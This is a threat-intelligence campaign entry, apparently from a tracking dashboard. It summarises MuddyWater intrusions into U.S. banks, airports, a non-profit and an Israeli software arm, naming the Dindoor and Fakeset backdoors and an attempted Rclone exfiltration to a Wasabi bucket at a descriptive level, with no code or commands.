Campaign
MuddyWater intrusion into U.S. networks and an Israeli software arm
Updated 06.03.2026 17:15
Case score 55
Score breakdown
- Total
- 55
- Lead score
- 55
- Support bonus
- +0 / 20
- Scoring support
- 0
- Context members
- 0
Top contributors
- Campaign Lead campaign item describing MuddyWater footholds across multiple U.S. organizations and an Israeli software arm, including Dindoor and attempted Rclone exfiltration. base
Case score 55
Members 1
Latest activity 06.03.2026 17:15
Members 1
First seen 06.03.2026 12:23
Last seen 06.03.2026 12:23
Updated 06.03.2026 17:15
Overview
MuddyWater has established footholds in U.S. banks, airports, a non-profit, and the Israeli arm of a software company, using a **Deno**-based **Dindoor** backdoor and an attempted **Rclone** transfer to a **Wasabi** bucket. The activity was assessed to have started in early February and was seen again after U.S. and Israeli military strikes on Iran, indicating the intrusion set remained active over time.
Available evidence points to persistence and attempted theft, but it does not quantify overall reach or the initial access path. Defender attention should center on **Dindoor**, **Fakeset**, and unusual cloud-storage egress tied to the affected networks.
MuddyWater has established footholds in U.S. banks, airports, a non-profit, and the Israeli arm of a software company. The activity was assessed to have started in early February and was seen again after U.S. and Israeli military strikes on Iran. Broadcom's Symantec and Carbon Black Threat Hunter Team tied the operation to MuddyWater, also known as Seedworm, and described it as a broad access campaign rather than a single isolated compromise.
The operators used a previously unknown backdoor called Dindoor, which executes through the Deno JavaScript runtime, and attempted to move data with Rclone to a Wasabi cloud bucket from the software company arm. Investigators also found a separate Python backdoor called Fakeset in other networks, with certificate reuse linking it to earlier MuddyWater tooling such as Stagecomp and Darkcomp. Available evidence does not quantify the full reach, initial access method, or downstream impact in each environment, but it does show persistence and attempted exfiltration across multiple victims.